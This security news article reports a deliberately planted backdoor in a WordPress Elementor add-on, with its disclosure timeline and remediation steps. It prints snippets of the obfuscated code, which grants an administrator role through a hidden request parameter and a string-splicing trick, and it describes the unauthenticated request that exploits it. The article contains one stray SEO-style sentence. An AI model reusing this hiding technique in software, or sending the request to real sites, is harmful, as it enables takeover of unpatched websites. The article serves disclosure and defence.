Over 20,000 active installations of the LA-Studio Element Kit for Elementor WordPress plugin are vulnerable to unauthenticated attacks due to a critical backdoor vulnerability This article explores wordpress plugin vulnerable. . The vulnerability, which was found on January 12, 2026, enables attackers to create malicious administrator users without requiring authentication.

Through its Bug Bounty Program, security company Wordfence verified the problem and gave credit to researchers Athiwat Tiprasaharn (Jitlada), Itthidej Aramsri (Boeing777), and Waris Damkham, who received a $975 bounty. Under CVE-2026-0920, the plugin, an Elementor add-on with header builders, widgets, and WooCommerce support, has a CVSS score of 9.8 (Critical). Versions from the first release to 1.5.6.3 are impacted. On January 14, 2026, LA-Studio patched it in version 1.6.0 following Wordfence's prompt disclosure through its Vulnerability Management Portal.

Insider threat risks were highlighted by the vendor's revelation that a former employee had inserted the backdoor code close to their departure in December 2025. Firewall protection was added for Wordfence Premium, Care, and Response users on January 13, 2026, and for free users on February 12, 2026. Websites need to be updated right away to prevent exploitation.

Technical Analysis and Details of the Exploit The backdoor is concealed in the ajax_register_handle() function of the LaStudio_Kit_Integration class, which handles user registrations. In order to initiate obfuscated code that grants administrator privileges, attackers supply the lakit_bkrole parameter. The mechanism is revealed by key code snippets: public function ajax_register_handle($request)Validation checks ... if (!empty($request['lakit_bkrole']) &&!empty ($sys_meta_key)){ add_filter( $sys_meta_key, [ $this, 'ajax_register_handle_backup' ], 20); } // ... registration logic ... Admin capabilities are injected by the ajax_register_handle_backup() method: public function ajax_register_handle_backup($meta){ global $table_prefix; $data = $table_prefix.

LaStudio_Kit_Helper::capabilities(); return apply_filters('lastudio-kit/integration/user-meta', $meta, $data); } The role assignment is then obscured by a filter: add_filter('lastudio-kit/integration/user-meta', function ( $value, $label); if(class_exists('LaStudio_Kit_Helper')){ $k = substr_replace(LaStudio_Kit_Helper::lakit_active(), 'mini', 2, 0); $value[ $label ] = [ $k => 1 ]; } return $value; }, 10, 2); Here, "adstrator" is returned by LaStudio_Kit_Helper::lakit_active(), which is changed to "administrator" through string manipulation. This evasion strategy got around simple scans. A POST request containing lakit_bkrole, username, email, and password is sent to the registration endpoint by unauthorized attackers.

With complete admin access, the new user can upload plugins and themes for content manipulation, persistent backdoors, and redirects. According to Wordfence, previous patches were concealed by changelog entries like "Fixed security issue" in versions 1.5.6.4, 1.5.6.3, and others, but the backdoor remained active until 1.6.0. WordPress administrators should update to LA-Studio Element Kit 1.6.0+ right away.

Use the wp_users table to look for rogue admin users (check recent registrations). Turn on firewalls such as Wordfence. Look for questionable POSTs to /wp-admin/admin-ajax.php using lakit_bkrole in access logs.

Put strong offboarding into practice by revoking credentials and auditing code commits after termination.